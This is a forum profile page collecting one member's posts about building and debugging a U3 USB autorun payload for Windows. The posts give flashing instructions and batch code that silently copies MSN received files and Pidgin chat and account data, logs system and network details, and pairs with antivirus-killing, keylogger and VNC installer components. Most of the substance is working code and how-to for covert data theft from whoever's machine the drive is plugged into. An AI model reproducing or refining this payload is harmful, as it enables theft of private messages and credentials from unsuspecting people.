Jump to content

Tmbomber

Active Members
 View Profile  See their activity

  • Posts

    59

  • Joined

  • Last visited

 Content Type 

Everything posted by Tmbomber

  1. Tmbomber
    I'm available for testing as well :) (actually I never left, just been rather busy so I haven't been posting :) )
  2. Tmbomber
    We have Thanksgiving now and Christmas break coming up. Give'em time.
  3. Tmbomber
    Leapo said a couple weeks ago that he can't do anything with the payload during the week. He's only working on it as he has time on weekends.
  4. Tmbomber
    Things to try: On your safetyed machine, run Menu.bat and disable everything. Turn on system information. On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it) On your target machine, verify that autorun is turned on. (I don't remember how to check that) *Then* stick your thumb drive in. Please report back what happened.
  5. Tmbomber
    Ok, Yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads. (they're pinned for a reason) I also read about half the other threads. There's all kinds of things to learn there. This goes against my better judgment, but... When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories. Before you do anything, create a text file in C:\ and name it "safety.txt" That'll keep you from hosing yourself. If you wanna do a payload from source files. Empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory get copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd" That will run a batch file that will create the .ISO file and put it where it belongs. If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin". In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\") Follow instructions *exactly* Expecially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer. NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do. For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload. For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it. Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.
  6. Tmbomber
    I tried this and still got the "No Disk" error. When the error popped up I left it there and took a look to see how far along the log file was. It was hung up in "Network Services" I turned the "Network Services" dump off and it ran silently (with everything else except slurp2 and the installers turned on) I have no idea why It'd give the error there.
  7. Tmbomber
    I think I found some source code for AVKill. http://www.datastronghold.com/archive/t13290.html
  8. Tmbomber
    Anybody seen Leapo around anywhere??? He hasn't posted in over a week. HEY LEAPO!!!! I hope your on vacation and resting yer brain a lot... We're all missing ya here.
  9. Tmbomber
    I had a problem of the batch file not finding the "FIND" command. I made mine look like: ver|%windir%\system32\find.exe "[Version 5.00." I need to check if win2k has a system32 directory. (It'd probably be easiest to just put a copy of the "FIND" command on the thumbdrive)
  10. Tmbomber
    Woops... just deleted what was here. I confused myself... Put this: IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 mkdir %logdir%\Slurp_Data\ tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1 assoc > %logdir%\Slurp_Data\assoc.log 2>&1 driverquery > %logdir%\Slurp_Data\driver.log 2>&1 right at the beginning of the slurp1 code block. I think Leapo was going to put a switch in to turn that on and off.
  11. Tmbomber
    *That*, is the infamous "No Disk" error that we've been talking about. It seems to stem from drive letters that show up in the list of drives that aren't actually drives. (such as on a laptop that has a CF slot when there's no CF card plugged into the slot) Leapo is presently working on a solution. Hey Leapo!!! How's that coming??? :)
  12. Tmbomber
    SanDisk sells a 3 pack of 2 gig thumbdrives colored Red, White, & Blue. You can also get a single one that's Black. I keep the white one stock (white being pure). The blue one has everything turned on except the installers and Slurp2. The red one only has "System Information" and the VNC installer. I'm thinking of what to do with the black one. As soon as I go through the other installers I'll probably have the black one be VNC (and maybe NMAP) and the red one have all 4 installers.
  13. Tmbomber
    Still looking into VNC. I just tried it on a win2k machine and it failed to install. The actual line that failed was: REGEDIT /s %installdir%\VNC\vnc.reg 2>&1 I'm not sure exactly what went wrong there. Also, Leapo, I had a thought... You were thinking of using the serial number of the USB drive to identify it. Would it be possible to run the test to see if the drive has *any* serial number, and then if it does, do the test we're doing now. That way it wouldn't do the IF Exists test unless there was actually a drive there to test. Just a thought...
  14. Tmbomber
    Moderator assistance in thread one... (could some nice moderator split the backtrack stuff off to a new thread please???)
  15. Tmbomber
    c.f. post 324 above. This is a known problem that exists if you have a USB card adapter. (one of those things that let you plug CF cards and SD cards and Smart Cards into your PC via a USB port) I have one on my home pc. Removing it makes the problem go away. I also have one built into my laptop at work... Can't remove that one. The problem stems from the drive detection portion of the payload. Leapo's previous post explains how he's trying to get around that. For the time being, just hit "Cancel" when that error pops up. (you may have to hit it several times.) Hey Leapo, I haven't checked, but could the problem also be in the go.vbs file???
  16. Tmbomber
    Scratch all that.... Made the start of Slurp1 look like: IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 mkdir %logdir%\Slurp_Data\ tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1 assoc > %logdir%\Slurp_Data\assoc.log 2>&1 driverquery > %logdir%\Slurp_Data\driver.log 2>&1 :: MSN Received Files and chatlogs mkdir %logdir%\Slurp_Data\MSN\ fc.exe "%USERPROFILE%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o That worked just fine, and kept the main log file looking a lot nicer. And my idea on getting around the adapter drives failed abysmally. So Leapo, I hope your idea pans out :)
  17. Tmbomber
    Added a block down near the end: IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Port Scan] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\portqry -local -v -v >> %log% 2>&1 :SkipPortScan IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1a ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [File Type Associations] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 assoc >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Driver Info] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 driverquery >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [C:\ Tree Listing] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 tree /F /A C:\ >> %log% 2>&1 :SkipSlurp1a ECHO. >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 I have it key off of Slurp1. (it seems to be that kinda data) I'm thinking of having the tree stored in the slurp folder as a separate file so it doesn't make the log file huge. I'll think on that one. Still haven't tried the installers. Everything else looks good at the moment. Going to try and figure out an easy way to ignore the USB card adapter drives. Then try the installers.
  18. Tmbomber
    I made some changes, used the Universal Customizer just like I have a hundred times, and Botched everything. For some reason I couldn't get my U3 thumb drive to auto launch. I thought I might have trashed it, so I dug out a new one and gave that a shot. Still had the same problem. No idea what I did. In all the mess. I think I've figured out where the no disk errors are coming from. In the beginning of Start.bat is the block of code that figures out what the drive letter is. It starts at Z: and works it's way backwards. My previous thumb drive mapped it's two partitions to M: and N: and the payload would run without the "No Disk" errors. Well, this new thumb drive mapped to E: and F: and for some reason the errors came back. Four of them. It just so happens I have one of those 11-in-1 adapters that lets me plug in CF cards and such. The adapter connects to a usb port and creates FOUR new drive letters. FOUR??????!!!?!?!?!?!!!!!! I checked. If you click on one of those without a card in it's corresponding slot you get a "Please insert disk" pop up window. I verified this was the problem by disconnecting the adapter. The "No Disk" errors went away. It appears that the "No Disk" errors are coming from the "IF EXIST" lines that are trying to access drives that show up but aren't really there. At the moment, I don't have a solution for this, but it at least explains things.
  19. Tmbomber
    Running: Microsoft Windows 2000 5.00.2195 Service Pack 4 I get: Microsoft Windows 2000 [Version 5.00.2195] Running: Microsoft Windows XP Professional Version 2002 Service Pack 2 I get: Microsoft Windows XP [Version 5.1.2600] Running: Microsoft Windows XP Professional Version 2002 Service Pack 3 v.3282 I get: Microsoft Windows XP [Version 5.1.2600] Running: Microsoft Windows XP Professional x64 Edition Version 2003 Service Pack 2 I get: Microsoft Windows [Version 5.2.3790] I find it odd that XP sp2 & XP sp3 report the same VER results. I'm working on getting information on what you get from Vista x64. For the find command, I'd use "[Version x.x". Something like this... ver|find "[Version 5.00." if errorlevel 1 goto SetOSwin2k ver|find "[Version 5.1." if errorlevel 1 goto SetOSXP32 ver|find "[Version 5.2." if errorlevel 1 goto SetOSXP64 ver|find "[Version 6.0." if errorlevel 1 goto SetOSVISTA32 ver|find "[Version 6.???" if errorlevel 1 goto SetOSVISTA64 :SetOSDefault goto SetOSXP32 :SetOSwin2k SET CurrentOS=win2k GOTO EndDetect :SetOSXP32 SET CurrentOS=XP32 GOTO EndDetect :SetOSXP64 SET CurrentOS=XP64 GOTO EndDetect :SetOSVISTA32 SET CurrentOS=VISTA32 GOTO EndDetect :SetOSVISTA64 SET CurrentOS=VISTA64 GOTO EndDetect :EndDetect I added a default to XP32 on the off chance the tests fail.
  20. Tmbomber
    Ok, starting on the installable stuff... I notice that the keylogger and NMAP don't have antidotes available, so I'll be starting with debugging Hacksaw and VNC. Does anybody know if the antidote files for these clean stuff out completely? I'm going to be infecting and curing my test machines multiple times and wanna be sure I can clean my slate before each test. Also, Is Gonzor still around? His site's been down for ages, so his External IP stuff isn't working.
  21. Tmbomber
    Changed this so it would work on Win2k... IF NOT EXIST %config%\Network_Services.cfg GOTO SkipNetServices ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Network Services] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IF EXIST "C:\Program Files (x86)" GOTO NSD1 IF EXIST "C:\Windows" GOTO NSD1 netstat.exe -an >> %log% 2>&1 GOTO SkipNetServices :NSD1 netstat.exe -abn >> %log% 2>&1 :SkipNetServices
  22. Tmbomber
    Hey TNTUNUS, is AVKILL working??? (silently???) What AV software have you tried it against???
  23. Tmbomber
    Ok, *that* worked fine... Also, added the following to the Slurp section: :: Pidgin Data mkdir %logdir%\Slurp_Data\Pidgin\ xcopy "C:\Documents and Settings\%username%\Application Data\.purple\*" "%logdir%\Slurp_Data\Pidgin\*" /s /c /q /r /h /y .purple as a directory name seems odd to me. Anybody else out there have Pidgin set up who can check that they have the same directory tree???
  24. Tmbomber
    DOH!!!! IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" Should read as.... IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles=C:\Program Files IF EXIST "C:\Program Files (x86)" SET progfiles=C:\Program Files (x86) ok, that oughta make Yahoo slurp.
  25. Tmbomber
    As I said, I'd love to give it a try as well.
×
×
  • Create New...